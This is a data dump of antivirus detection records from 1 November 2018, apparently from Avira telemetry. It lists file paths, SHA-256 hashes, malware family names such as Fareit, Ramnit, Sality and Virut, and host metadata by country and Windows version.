  Row(detection=Row(filename='207144232040455.exe', filepath='\\\\?\\C:\\Temp\\207144232040455.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='207144232040455.exe', filepath='\\\\?\\C:\\Temp\\207144232040455.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='102613014533326.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\102613014533326.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='135464244321145.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\135464244321145.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='138452618526670.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\138452618526670.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='234902741324690.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\234902741324690.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='230881192938357.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\230881192938357.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='247421245311304.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\247421245311304.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='213691076015634.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\213691076015634.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='135464244321145.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\135464244321145.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='247421245311304.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\247421245311304.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='230881192938357.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\230881192938357.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='138452618526670.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\138452618526670.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='213691076015634.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\213691076015634.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='234902741324690.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\234902741324690.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='213691076015634.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\213691076015634.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='135464244321145.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\135464244321145.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='234902741324690.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\234902741324690.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='230881192938357.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\230881192938357.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='247421245311304.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\247421245311304.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='138452618526670.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\138452618526670.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='102613014533326.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\102613014533326.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='basic.exe', filepath='\\\\?\\G:\\Hooshmand\\CH_ENGLISH\\basic\\basic.exe', filesize=3072000, name='HEUR/APC.#M1.#R1'), hash='1bb80ab49f64b178fc3a25b4982c17162a65ff43a170e010b740c70e00a4c989', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cg.dll', filepath='D:\\Virtools\\Virtools 4.0\\cg.dll', filesize=2048000, name='W32/Ramnit.CD.#M1.#R1'), hash='1bbc6c89ff43e90be6f6e822e63a132fc00167744f45cb05610ce3d6559b6d31', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:38:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rome2.dll', filepath='H:\\Total War Rome II Emperor Edition\\Rome2.dll', filesize=26752000, name='W32/Ramnit.CD.#M1.#R1'), hash='1bc1882a15ffcfed8f266998f6b4fb8bdab162d73dfd41a0ae29af57feaebf92', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T14:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1bc88bc3077486d2c93d226264fd02b2dcfc25b2dceff7b022adff0d5b16c75e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1BC88BC3077486D2C93D226264FD02B2DCFC25B2DCEFF7B022ADFF0D5B16C75E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bc88bc3077486d2c93d226264fd02b2dcfc25b2dceff7b022adff0d5b16c75e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:20:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=240000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1bf03d89944562171b570d2361296d3a0fb700614c1f80c1aef5e2386162e255', metadata=Row(cmdline=None, country='AF', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T17:21:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\ksII\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='1c34853a7fb0986859e6d0202e4a093042e32773aaf7903ce2012434a0ebefc9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:05:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='feedingfrenzy.exe', filepath='h:\\العاب0\\feedingfrenzy\\FeedingFrenzy.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1c79d4565b271605f1974e2626eb5cd3c6c8ae5091b3d1b89b0e29a82c5ae12a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0076482.exe', filepath='h:\\system volume information\\_restore{7c131188-5303-4a72-8ded-6be12a1b82b9}\\rp16\\A0076482.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1c79d4565b271605f1974e2626eb5cd3c6c8ae5091b3d1b89b0e29a82c5ae12a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134906-e64f115e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a11000ca\\AVSCAN-20181101-133328-948CF95C\\AVSCAN-20181101-134906-E64F115E', filesize=2624000, name='TR/Wdfload.1c7b06.#M1.#R1'), hash='1c7b061e3c3050e0e94a836ad4134f8a94ed895fd8cfabb842a1575e32088302', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igfxcfg.exe', filepath='I:\\Driver\\899_drivers\\Intel\\I915GM\\Vga\\Windrv\\Win2000\\igfxcfg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='1c7bfd93ff5aff1b33c6a9a171f8838efdcba9cd870071487994e01e19bacd0d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:06:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpusbfw.exe', filepath='\\\\?\\J:\\لتنزيل الويندوز على فلاشة\\ASD.Win.Setup.1.0.Beta.7.AhMeD00FaWzY\\files\\tools\\HPUSBFW.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1ca878d3d78fd8acaa7a72d23489d9dd2b698228845ce283eaea73313d6d5e5c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1ca91954b7c472a5df424c20948325f86dcd70dcf888087566e352e4f6aa77c2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\1CA91954B7C472A5DF424C20948325F86DCD70DCF888087566E352E4F6AA77C2', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='1ca91954b7c472a5df424c20948325f86dcd70dcf888087566e352e4f6aa77c2', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:48:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1cf172edf1ab698059a0eb729bc4ebae80f7469d194ca47c58a4dfae2c9251b4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1CF172EDF1AB698059A0EB729BC4EBAE80F7469D194CA47C58A4DFAE2C9251B4', filesize=432000, name='ADWARE/Adware.Gen.#M300.#R1885'), hash='1cf172edf1ab698059a0eb729bc4ebae80f7469d194ca47c58a4dfae2c9251b4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:02:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diner das1h.exe', filepath='\\?\\J:\\العاب2\\الطباخه\\Diner Das1h.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='1d829dace0c81447940ca69d6dbd0f054fad719994a9bbd763595d21306c64c2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161303-dd29df01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161303-DD29DF01', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1db031dd1b44e54b3a07b549a9b0fae74898207fff1890788a72a5a60857729b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161727-f8c8971b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161727-F8C8971B', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1db031dd1b44e54b3a07b549a9b0fae74898207fff1890788a72a5a60857729b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='điều 44.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Điều 44.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='1db031dd1b44e54b3a07b549a9b0fae74898207fff1890788a72a5a60857729b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='config.exe', filepath='\\?\\J:\\العاب2\\بطاطس\\Config.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='1dd4196bdc12a216aaaf81538a99c91bcd32e9bf53a865005c7cf662afd037e3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:11:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered codas', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered codas', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='1e054b0e49b4ec2b7fda968c1089d240a94880ed8917dda7b7e0285db40634b9', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T19:55:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='quy dinh tiep nhan tin bao cua cax.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Quy dinh tiep nhan tin bao cua CAX.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='1e7ebb456d8b1d0cfbb646f0374da6f987bf4c7b141db293d667c65aeabb09c0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161750-fb305fdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161750-FB305FDC', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1e7ebb456d8b1d0cfbb646f0374da6f987bf4c7b141db293d667c65aeabb09c0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161528-ec58a517', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161528-EC58A517', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1e7ebb456d8b1d0cfbb646f0374da6f987bf4c7b141db293d667c65aeabb09c0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114706-b5522a2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3cdc0ac5\\AVSCAN-20181101-114604-ACAA707D\\AVSCAN-20181101-114706-B5522A2D', filesize=1920000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='1ec7a1b2fe126b7041a87a1f3b5d05409635c6c4555d40625662833f0965a7f6', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kawai2003.exe', filepath='\\\\?\\D:\\Phim cua Minh Bach\\Games\\Kawai2003\\Kawai2003.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='1f2e80e7e2433fa6c9baa5d8cbbcd3aeb6783d5ef3cf2a020cb303cc3608dedb', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:35:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1f690db1ac2c8a3aa6328775ba3d6f9a31176dede908bef9b4b4b0e1d362d240', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1F690DB1AC2C8A3AA6328775BA3D6F9A31176DEDE908BEF9B4B4B0E1D362D240', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1f690db1ac2c8a3aa6328775ba3d6f9a31176dede908bef9b4b4b0e1d362d240', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1f6b762cfcd896d4b3a1ee42ddcd70fdf5fede4a3b5b6dac0a119dae0df9ab3a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1F6B762CFCD896D4B3A1EE42DDCD70FDF5FEDE4A3B5B6DAC0A119DAE0DF9AB3A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1f6b762cfcd896d4b3a1ee42ddcd70fdf5fede4a3b5b6dac0a119dae0df9ab3a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1332000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1f6ed76428fe99315fa7880d2d5eb490678a7be1d9cb4a58544a6a77485e959e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T08:58:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0358770.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1567\\A0358770.exe', filesize=1548000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='1f74394739fdf5619ded0f415d8bd61e3b708e64b6e2840f9672ef3571f19c25', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:58:57Z'), dt=datetime.date(2018, 11, 1)),
